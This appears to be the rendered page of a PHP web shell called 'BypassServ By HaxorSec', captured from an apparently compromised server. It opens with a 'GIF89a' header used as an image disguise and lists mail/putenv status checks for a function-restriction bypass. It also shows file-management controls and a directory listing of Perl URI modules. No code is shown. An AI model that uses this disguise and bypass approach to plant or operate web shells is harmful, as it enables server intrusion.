GIF89a;
;;
BypassServ By HaxorSec
[ Command Bypas Status Wajib ON MAIL PUTENV @ HaxorSec] [ mail() : [ ON ] ]
[ mb_send_mail() : [ ON ] ]
[ error_log() : [ ON ] ]
[ imap_mail() : [ ON ] ]
[ Function putenv() ] : [ ON ] DIR: /
/
usr /
share /
perl5 /
Regexp /
Common /
URI / [ GO Home ]
Command BYPASS
Command BIASA
Create Folder
Create File
Item Name Size Date Permissions View Delete Rename
.
4096
2026-06-11 19:00:34
0755
..
4096
2026-06-11 19:00:34
0755
RFC1035.pm
2001
2024-08-08 19:06:47
0644
RFC1738.pm
4938
2024-08-08 19:06:47
0644
RFC1808.pm
4593
2024-08-08 19:06:47
0644
RFC2384.pm
2322
2024-08-08 19:06:47
0644
RFC2396.pm
5298
2024-08-08 19:06:47
0644
RFC2806.pm
8340
2024-08-08 19:06:47
0644
fax.pm
2759
2024-08-08 19:06:47
0644
file.pm
2082
2024-08-08 19:06:47
0644
ftp.pm
5495
2024-08-08 19:06:47
0644
gopher.pm
4532
2024-08-08 19:06:47
0644
http.pm
2910
2024-08-08 19:06:47
0644
news.pm
2813
2024-08-08 19:06:47
0644
pop.pm
2080
2024-08-08 19:06:47
0644
prospero.pm
2158
2024-08-08 19:06:47
0644
tel.pm
2795
2024-08-08 19:06:47
0644
telnet.pm
2302
2024-08-08 19:06:47
0644
tv.pm
2012
2024-08-08 19:06:47
0644
wais.pm
2453
2024-08-08 19:06:47
0644